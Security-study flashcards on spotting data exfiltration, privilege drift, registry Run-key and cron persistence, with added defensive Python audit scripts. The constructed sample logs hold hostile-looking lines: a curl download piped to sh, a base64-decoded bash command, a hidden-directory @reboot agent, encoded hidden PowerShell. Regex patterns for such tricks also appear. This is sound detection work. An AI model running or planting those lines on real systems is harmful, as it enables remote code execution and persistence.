(3) Unauthorized access, privileges, changes, and data theft Flashcards
For most threats to systems, what is one of the key indicators of malicious activity on a system or network?
For most threats to systems, one of the key indicators of malicious activity on a system or network is data exfiltration: the unauthorized removal of data from datastores or computers to a location the attacker controls
Describe the tug of war between security practitioners and bad actors in the battle over data
In the battle over data, security practitioners need tools and techniques to find and stop data from being stolen, while bad actors normally try to hide data theft activities through:
encryption, blending into commonly used channels such as HTTPS, or covert channels such as tunneling data through DNS queries and other services
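The DNS tunneling point above, as an added example that is not part of the original flashcards: a Python script that scores a constructed resolver log for the tunneling signature (many distinct, long, high-entropy subdomains under one base domain, mostly TXT/NULL queries). The log format, the two-label base-domain approximation, and all thresholds are assumptions to tune for a real environment.

```python
"""Flag DNS query patterns that look like tunnelling (added example, constructed input)."""
import math
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed resolver log, one "client qname qtype" per line; not from a real system.
# 10.0.0.7 sends many long, high-entropy TXT queries under one domain, the tunnelling signature.
SAMPLE_LOG = """\
10.0.0.5 www.example.com A
10.0.0.5 api.example.com A
10.0.0.5 cdn.example.com AAAA
10.0.0.9 mail.example.org MX
10.0.0.7 7a3c9f1e4b8d2a6c5e0f9b3d7c1a2e4f6b8d0c2e.t.example.net TXT
10.0.0.7 1f2e3d4c5b6a79880011aabbccddeeff01234567.t.example.net TXT
10.0.0.7 deadbeefcafef00d0badc0de1234567890abcdef.t.example.net TXT
10.0.0.7 0123456789abcdeffedcba9876543210a5a5a5a5.t.example.net TXT
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")
RARE_QTYPES = {"TXT", "NULL", "CNAME"}   # types tunnels favour because answers can carry more data


def shannon_entropy(s: str) -> float:
    """Bits per character; hex/base32/base64 payloads score far above dictionary words."""
    if not s:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname: str) -> Tuple[str, str]:
    """(subdomain, base domain). Base domain is approximated as the last two labels,
    an assumption; production code should consult the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_log(text: str) -> List[Tuple[str, str, str]]:
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append((m.group(1), m.group(2), m.group(3).upper()))
    return records


def score_tunnels(records, min_distinct=3, min_avg_len=30, min_entropy=3.5, min_rare_share=0.5):
    """Group queries by (client, base domain) and flag groups with many distinct subdomains
    that are long, high-entropy, or dominated by rare query types. Thresholds are assumptions."""
    groups = defaultdict(list)
    for client, qname, qtype in records:
        sub, base = split_qname(qname)
        groups[(client, base)].append((sub, qtype))
    findings = {}
    for (client, base), items in groups.items():
        subs = {s for s, _ in items if s}
        if len(subs) < min_distinct:
            continue                      # one odd name is not a channel
        avg_len = sum(len(s) for s in subs) / len(subs)
        entropy = shannon_entropy("".join(subs).replace(".", ""))
        rare_share = sum(1 for _, t in items if t in RARE_QTYPES) / len(items)
        reasons = []
        if avg_len >= min_avg_len:
            reasons.append("long_labels")
        if entropy >= min_entropy:
            reasons.append("high_entropy")
        if rare_share >= min_rare_share:
            reasons.append("rare_qtypes")
        if reasons:
            findings[(client, base)] = {"distinct": len(subs), "avg_len": round(avg_len, 1),
                                        "entropy": round(entropy, 2), "reasons": reasons}
    return findings


if __name__ == "__main__":
    for (client, base), info in score_tunnels(parse_log(SAMPLE_LOG)).items():
        print(f"{client} -> {base}: {info}")
```

Run against a passive-DNS or resolver export and the benign hosts drop out: three short names under example.com never trip a rule, while the single client hammering one domain with 40-character labels is reported with every reason that fired, which is what an analyst needs to decide between a tunnel and a chatty CDN.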
What types of tools should be involved in the battle to keep data from being stolen?
Data Loss Prevention (DLP), endpoint detection and response (EDR), and intrusion prevention systems (IPS) all play a role in preventing data from being stolen.
In addition, data tagging (classifying and labeling sensitive data so DLP rules can recognize it when it moves) and other protection measures are useful too
What types of analysis tools can be used to detect, prevent, and mitigate unauthorized access, changes, and privilege use?
Tools such as a central management suite, SIM/SIEM (security information and event management), file integrity checking tools, and log analysis tools are useful to detect unauthorized access, changes, or privilege use
Unauthorized privileges can be tough to track, especially if central management isn’t in place, but what can be used to help avoid this?
Sysinternals AccessChk (accesschk.exe) can validate that users and groups have only the intended effective access to files, directories, registry keys, services, and other securable objects, so drift from the expected permissions shows up
Within Linux, as an aside, there is no direct equivalent, so a script (for example one built around find, stat, and getfacl) may be needed to accomplish this
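The Linux script mentioned above, as an added example that is not from the original page: a Python stand-in for the file side of AccessChk that walks a tree and reports world-writable, setuid, setgid and group-writable-executable entries. The sample tree is constructed in a temporary directory; in practice point audit_tree at /etc, /usr/local or a service's install directory and diff the output against a baseline taken when the host was known good.

```python
"""Linux stand-in for AccessChk on files: find modes that grant more than intended (added example)."""
import os
import stat
import tempfile
from typing import Dict, List, Tuple


def classify_mode(mode: int) -> List[str]:
    """Return the risky properties of an st_mode value (pure function, easy to test)."""
    reasons = []
    # Sticky, world-writable directories such as /tmp are expected; anything else is not.
    if mode & stat.S_IWOTH and not (stat.S_ISDIR(mode) and mode & stat.S_ISVTX):
        reasons.append("world_writable")
    if mode & stat.S_ISUID:
        reasons.append("setuid")
    if stat.S_ISREG(mode) and mode & stat.S_ISGID and mode & stat.S_IXGRP:
        reasons.append("setgid")
    # A group-writable executable lets every group member plant code that other users run.
    if (stat.S_ISREG(mode) and mode & stat.S_IWGRP
            and mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)):
        reasons.append("group_writable_executable")
    return reasons


def audit_tree(root: str) -> List[Dict]:
    """Walk root (not following symlinks) and report every entry with a risky mode."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                        # vanished or unreadable; skip rather than abort
            if stat.S_ISLNK(st.st_mode):
                continue                        # the target's mode is what matters, not the link's
            reasons = classify_mode(st.st_mode)
            if reasons:
                findings.append({"path": path, "mode": oct(stat.S_IMODE(st.st_mode)),
                                 "uid": st.st_uid, "gid": st.st_gid, "reasons": reasons})
    return findings


def demo_tree() -> Tuple[str, List[Dict]]:
    """Build a constructed sample tree in a temp dir (one clean file, one 0777 script) and audit it."""
    root = tempfile.mkdtemp(prefix="acl-audit-")
    clean = os.path.join(root, "config.txt")
    bad = os.path.join(root, "deploy.sh")
    with open(clean, "w") as fh:
        fh.write("harmless\n")
    with open(bad, "w") as fh:
        fh.write("#!/bin/sh\necho deploy\n")
    os.chmod(clean, 0o644)
    os.chmod(bad, 0o777)        # anyone on the box can edit a script that root may later run
    return root, audit_tree(root)


if __name__ == "__main__":
    root, findings = demo_tree()
    for f in findings:
        print(f"{f['mode']} uid={f['uid']} {f['path']}: {', '.join(f['reasons'])}")
```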
What is a key target that attackers like to exploit to get and maintain access to a Windows system?
The Windows registry is a key location attackers use to get and maintain access to a Windows system; they especially like the "run" keys, because every program listed there is launched automatically at logon
What are the important “run” keys that attackers like to take advantage of?
The important "run" keys that attackers like to take advantage of (HKEY_LOCAL_MACHINE entries fire for every user, HKEY_CURRENT_USER entries for that one user, and RunOnce entries are deleted after they run) include:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
When it comes to protecting the Registry in Windows, what should be done to protect systems that have infrequent changes (such as servers)?
For systems that have infrequent changes, like servers, protecting the registry is relatively easy: application allow lists keep unapproved programs from running in the first place, and any registry change outside a planned maintenance window can be treated as suspicious
When it comes to protecting the Registry in Windows, what should be done to protect systems when registry monitoring tools cannot be implemented?
When registry monitoring tools cannot be implemented, a lockdown tool can be used to block all registry changes outright
When it comes to protecting the Registry in Windows, what should be done to protect systems when registry changes are allowed?
When registry changes must be allowed (for example while patching Windows), the monitoring tool should be switched to a mode that permits, but still logs, changes for the duration of the patch window, then turned back to its enforcing mode for daily operations, rather than being shut off entirely
When it comes to protecting the Registry in Windows, what should be done to protect systems when changes can be made more frequently?
When changes may be made more frequently, finer-grained controls should be put in place, such as an agent-based tool that knows which processes and users may change which keys, so that legitimate changes do not drown the alerts in false positives
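One way to watch the four Run/RunOnce keys listed above on an infrequently changing host, as an added example that is not part of the original flashcards: a Python script that parses the text file written by reg export and diffs it against a known-good baseline, tagging new or changed values that carry common persistence traits. The .reg sample, the baseline and the heuristic patterns are constructed; on a real host export each key with reg export and open the file with encoding="utf-16".

```python
"""Audit Run/RunOnce values from a `reg export` file against a known-good baseline (added example)."""
import re
from typing import Dict, List, Tuple

# The four autostart keys attackers favour (HKLM entries run for every user, HKCU for one user).
RUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
)
RUN_KEYS_LC = {k.lower() for k in RUN_KEYS}   # registry paths are case-insensitive

# Constructed sample in the text format `reg export <key> file.reg` writes (several exports
# concatenated); not captured from a real host. Real exports are UTF-16LE: open with encoding="utf-16".
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="powershell.exe -w hidden -enc SQBFAFgA"
"Svc"="C:\\Users\\alice\\AppData\\Local\\Temp\\svc.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"""

# Baseline captured from a known-good build of the same image (constructed here).
BASELINE = {
    (RUN_KEYS[0].lower(), "SecurityHealth"): r"%windir%\system32\SecurityHealthSystray.exe",
    (RUN_KEYS[1].lower(), "OneDrive"):
        r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}

KEY_RE = re.compile(r"^\[(.+)\]$")
STRING_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

# Traits of a Run value worth a second look; heuristics, not a complete list.
SUSPICIOUS = [
    ("encoded_powershell", re.compile(r"powershell.*\s-(e|ec|enc|encodedcommand)\b", re.I)),
    ("user_writable_path", re.compile(r"\\(users|appdata|temp|programdata|public)\\", re.I)),
    ("lolbin", re.compile(r"\b(mshta|rundll32|regsvr32|wscript|cscript|certutil)(\.exe)?\b", re.I)),
]


def _unescape(s: str) -> str:
    return re.sub(r"\\(.)", r"\1", s)   # .reg escapes backslash and quote with a backslash


def parse_reg(text: str) -> Dict[Tuple[str, str], str]:
    """Map (key path lower-cased, value name) -> string data; non-string values are skipped."""
    entries, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1).lower()
            continue
        m = STRING_VALUE_RE.match(line)
        if m and key is not None:
            entries[(key, _unescape(m.group(1)))] = _unescape(m.group(2))
    return entries


def audit_run_keys(entries: Dict[Tuple[str, str], str], baseline: Dict[Tuple[str, str], str]) -> List[Dict]:
    """Report values that are new, changed, or removed relative to the baseline, with heuristic tags."""
    findings = []
    for (key, name), value in entries.items():
        if key not in RUN_KEYS_LC:
            continue
        expected = baseline.get((key, name))
        if expected == value:
            continue
        findings.append({
            "key": key, "name": name, "value": value,
            "status": "changed" if expected is not None else "new",
            "reasons": [tag for tag, rx in SUSPICIOUS if rx.search(value)],
        })
    for (key, name), value in baseline.items():
        if (key, name) not in entries:
            findings.append({"key": key, "name": name, "value": value, "status": "removed", "reasons": []})
    return findings


if __name__ == "__main__":
    for f in audit_run_keys(parse_reg(SAMPLE_REG), BASELINE):
        print(f["status"].upper(), f["name"], "=", f["value"], f["reasons"])
```

The baseline does the heavy lifting on a server: two entries that match it produce no output, and only the encoded PowerShell one-liner and the executable living under a user-writable Temp directory are reported. Removed entries are reported too, since an attacker who deletes a security product's autostart is as interesting as one who adds their own.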
What do we need to be aware of when it comes to scheduled tasks?
When it comes to scheduled tasks, attackers love to use them to keep persistent access to systems, so checking for unexpected scheduled tasks is a normal part of incident response
How can one check for scheduled tasks in Windows 10?
In Windows 10, one can check for scheduled tasks by going to Start, Windows Administrative Tools, Task Scheduler
How can one check for scheduled tasks in Windows 11?
In Windows 11, one can check for scheduled tasks by going to Start, Windows Tools, Task Scheduler (on either version, schtasks /query /fo LIST /v at a command prompt lists every task with its command line, which is easier to review at scale)
How does one check for scheduled tasks in Linux?
In Linux, one can check for scheduled tasks by checking cron: /etc/crontab, the /etc/cron.d directory, the /etc/cron.hourly, cron.daily, cron.weekly and cron.monthly script directories, and each user's crontab under /var/spool/cron (crontab -l shows the current user's); at jobs and systemd timers (systemctl list-timers --all) are other places scheduled work can hide
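A cron audit for the Linux check above, as an added example that is not from the original page: a Python parser for both crontab formats (system files with a user field, per-user spool files without) that flags the patterns attackers typically plant, such as download-and-execute pipelines, base64-decoded payloads and binaries under /dev/shm or hidden directories. The crontab samples, the IP address and the heuristic patterns are constructed; scan_host reads the real locations on a live host.

```python
"""Parse cron entries and flag the ones attackers typically plant (added example, constructed input)."""
import glob
import re
from typing import Dict, List

# Constructed /etc/crontab-style sample (system format: schedule, user, command); not from a real host.
SAMPLE_SYSTEM_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 *   * * *   root    curl -s http://203.0.113.10/u.sh | sh
@reboot         root    /dev/shm/.x/agent &
"""

# Constructed per-user crontab sample (user format: schedule, command).
SAMPLE_USER_CRONTAB = """\
0 2 * * * /home/alice/bin/backup.sh
* * * * * echo cHl0aG9uMyAtYyAuLi4= | base64 -d | bash
"""

# Heuristics, not a complete list; tune to the environment.
SUSPICIOUS = [
    ("download_and_execute", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b", re.I)),
    ("base64_decode", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("tmp_path", re.compile(r"(/tmp|/dev/shm|/var/tmp)/")),
    ("hidden_dir", re.compile(r"/\.[^/\s]+/")),
]


def parse_crontab(text: str, system_format: bool) -> List[Dict]:
    """system_format=True for /etc/crontab and /etc/cron.d/* (they carry a user field);
    False for spool files under /var/spool/cron, which belong to one user."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue                        # blank, comment, or VAR=value line
        tokens = line.split()
        if tokens[0].startswith("@"):       # @reboot, @daily, ... take the place of five fields
            schedule, rest = tokens[0], tokens[1:]
        else:
            schedule, rest = " ".join(tokens[:5]), tokens[5:]
        user = rest[0] if system_format and rest else None
        command = " ".join(rest[1:] if system_format else rest)
        entries.append({"schedule": schedule, "user": user, "command": command})
    return entries


def audit_entries(entries: List[Dict]) -> List[Dict]:
    """Return only the entries that trip a heuristic, each with the reasons that fired."""
    findings = []
    for e in entries:
        reasons = [tag for tag, rx in SUSPICIOUS if rx.search(e["command"])]
        if e["schedule"] == "* * * * *":
            reasons.append("runs_every_minute")   # typical of beaconing or a watchdog restarting malware
        if reasons:
            findings.append({**e, "reasons": reasons})
    return findings


def scan_host() -> List[Dict]:
    """Read the usual cron locations on a live Linux host. /etc/cron.{hourly,daily,...} hold
    scripts rather than crontab lines, and systemd timers are a separate surface; both still need a look."""
    sources = [("/etc/crontab", True)] + [(p, True) for p in glob.glob("/etc/cron.d/*")]
    sources += [(p, False) for p in glob.glob("/var/spool/cron/crontabs/*") + glob.glob("/var/spool/cron/*")]
    findings = []
    for path, system_format in sources:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
        except OSError:
            continue                        # unreadable, or a directory such as /var/spool/cron/crontabs
        for f in audit_entries(parse_crontab(text, system_format)):
            findings.append({"source": path, **f})
    return findings


if __name__ == "__main__":
    for f in audit_entries(parse_crontab(SAMPLE_SYSTEM_CRONTAB, True)):
        print("system", f["schedule"], f["user"], f["command"], f["reasons"])
    for f in audit_entries(parse_crontab(SAMPLE_USER_CRONTAB, False)):
        print("user  ", f["schedule"], f["command"], f["reasons"])
```

The two stock run-parts lines pass cleanly; the curl-piped-to-sh job, the agent started from a hidden directory under /dev/shm at boot, and the per-minute base64 decode are the three that come back, each with the reason an analyst would want in the ticket.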